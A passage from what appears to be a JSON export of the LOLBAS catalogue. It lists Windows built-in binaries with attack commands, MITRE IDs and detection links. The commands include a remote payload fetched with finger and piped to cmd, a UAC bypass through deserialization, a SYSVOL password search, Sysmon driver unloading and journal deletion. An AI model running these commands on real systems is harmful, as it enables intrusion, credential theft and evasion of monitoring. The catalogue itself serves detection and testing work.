prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"]},{"id":"lolbas:eventvwr-exe:1","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c \"{CMD}\" > RecentViews & copy RecentViews %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews & eventvwr.exe","description":"During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net","usecase":"Execute a command to bypass security restrictions that limit the use of command-line interpreters.","mitre":["T1548.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"]},{"id":"lolbas:expand-exe:0","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}","description":"Copies source file to destination.","usecase":"Use to copies the source file to the destination file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"]},{"id":"lolbas:expand-exe:1","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}","description":"Copies source file to destination.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"]},{"id":"lolbas:expand-exe:2","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat","description":"Copies source file to destination Alternate Data Stream (ADS)","usecase":"Copies files from A to B","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"]},{"id":"lolbas:explorer-exe:0","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe /root,\"{PATH_ABSOLUTE:.exe}\"","description":"Execute specified .exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"]},{"id":"lolbas:explorer-exe:1","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe {PATH_ABSOLUTE:.exe}","description":"Execute notepad.exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"]},{"id":"lolbas:extexport-exe:0","toolId":"lolbas:extexport-exe","toolName":"Extexport.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Extexport.exe {PATH_ABSOLUTE:folder} foo bar","description":"Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.","usecase":"Execute dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml"},{"type":"IOC","value":"Extexport.exe loads dll and is execute from other folder the original path"}],"references":["http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Extexport/"]},{"id":"lolbas:extrac32-exe:0","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:extrac32-exe:1","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:extrac32-exe:2","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}","description":"Copy the source file to the destination file and overwrite it.","usecase":"Download file from UNC/WEBDav","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:extrac32-exe:3","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}","description":"Command for copying file from one folder to another","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:findstr-exe:0","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.","usecase":"Add a file to an alternate data stream to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:findstr-exe:1","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.","usecase":"Add a file to an alternate data stream from a webdav server to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:findstr-exe:2","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"findstr /S /I cpassword \\\\sysvol\\policies\\*.xml","description":"Search for stored password in Group Policy files stored on SYSVOL.","usecase":"Find credentials stored in cpassword attrbute","mitre":["T1552.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:findstr-exe:3","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.","usecase":"Download/Copy file from webdav server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:finger-exe:0","toolId":"lolbas:finger-exe","toolName":"Finger.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"finger user@example.host.com | more +2 | cmd","description":"Downloads payload from remote Finger server. This example connects to \"example.host.com\" asking for user \"user\"; the result could contain malicious shellcode which is executed by the cmd process.","usecase":"Download malicious payload","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml"},{"type":"IOC","value":"finger.exe should not be run on a normal workstation."},{"type":"IOC","value":"finger.exe connecting to external resources."}],"references":["https://twitter.com/DissectMalware/status/997340270273409024","https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)","https://lolbas-project.github.io/lolbas/Binaries/Finger/"]},{"id":"lolbas:fltmc-exe:0","toolId":"lolbas:fltmc-exe","toolName":"fltMC.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fltMC.exe unload SysmonDrv","description":"Unloads a driver used by security agents","usecase":"Defense evasion","mitre":["T1562.001"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\fltMC.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml"},{"type":"IOC","value":"4688 events with fltMC.exe"}],"references":["https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon","https://lolbas-project.github.io/lolbas/Binaries/fltMC/"]},{"id":"lolbas:forfiles-exe:0","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{CMD}\"","description":"Executes specified command since there is a match for notepad.exe in the c:\\windows\\System32 folder.","usecase":"Use forfiles to start a new process to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"]},{"id":"lolbas:forfiles-exe:1","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{PATH_ABSOLUTE}:evil.exe\"","description":"Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.","usecase":"Use forfiles to start a new process from a binary hidden in an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"]},{"id":"lolbas:fsutil-exe:0","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}","description":"Zero out a file","usecase":"Can be used to forensically erase a file","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"]},{"id":"lolbas:fsutil-exe:1","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe usn deletejournal /d c:","description":"Delete the USN journal volume to hide file creation activity","usecase":"Can be used to hide file creation activity","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"]},{"id":"lolbas:fsutil-exe:2","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"fsutil.exe trace decode","description":"Executes a pre-planted binary named netsh.exe from the current directory.","usecase":"Spawn a pre-planted executable from fsutil.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"]},{"id":"lolbas:ftp-exe:0","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt","description":"Executes the commands you put inside the text file.","usecase":"Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of 